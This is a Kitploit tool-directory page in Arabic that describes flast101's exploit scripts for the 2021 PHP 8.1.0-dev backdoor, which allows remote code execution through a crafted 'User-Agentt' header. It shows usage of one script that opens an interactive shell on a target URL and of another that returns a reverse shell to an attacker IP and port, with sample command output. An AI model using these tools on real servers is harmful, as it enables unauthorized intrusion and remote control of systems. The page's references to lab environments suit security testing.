Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
php-8.1.0-dev-backdoor-rce — سكربت شل نظام خلفي PHP 8.1.0-dev | Kitploit
أدوات/GitHubGitHub/flast101/php-8.1.0-dev-backdoor-rce
الاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubflast101/php-8.1.0-dev-backdoor-rce

php-8.1.0-dev-backdoor-rce

سكربت شل نظام خلفي PHP 8.1.0-dev

عرض المستودع
9421منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PHP 8.1.0-dev باب خلفي لتنفيذ الأكواد عن بُعد

سكريبت شِل النظام للباب الخلفي في PHP 8.1.0-dev

docs/logo_php81.png

تم إطلاق PHP 8.1.0-dev مع باب خلفي في 28 مارس 2021، لكن تم اكتشاف الباب الخلفي وإزالته بسرعة. إذا كانت نسخة PHP هذه تعمل على خادم، فيمكن للمهاجم تنفيذ أكواد عشوائية عن طريق إرسال ترويسة User-Agentt.

تمت استعادة الكود الأصلي بعد اكتشاف المشكلة، لكن عُبث به مرة ثانية. كان من شأن هذا الاختراق أن يُنشئ باباً خلفياً في أي مواقع ويب تشغّل نسخة PHP المخترقة، مما يتيح للقراصنة تنفيذ أكواد عن بُعد على الموقع.

اقرأ المقال كاملاً: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/


سكريبت إثبات المفهوم

يستخدم سكريبت الاستغلال القصير هذا backdoor_php_8.1.0-dev.py الباب الخلفي لتوفير شِل نظام شبه حقيقي على المضيف. يمكنك العثور عليه على Exploit DB.

  • عنوان الاستغلال: PHP 8.1.0-dev باب خلفي لتنفيذ الأكواد عن بُعد
  • التاريخ: 23 مايو 2021
  • مؤلف الاستغلال: flast101
  • الصفحة الرئيسية للمورّد: https://www.php.net/
  • رابط البرنامج: https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
  • تم اختباره على الإصدار: 8.1.0-dev
  • CVE : N/A
  • مراجع الثغرة: https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

الاستخدام:

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
  
Enter the host url:
http://a.b.c.d

Interactive shell is opened on http://a.b.c.d 
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

الشِل العكسي

يمنحك سكريبت الاستغلال القصير هذا revshell_php_8.1.0-dev.py شِل عكسي على الهدف.

الاستخدام:

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

docs/revshell-script.png

كن فضولياً، فالتعلم هو الحياة! 😃

تنزيل الأداة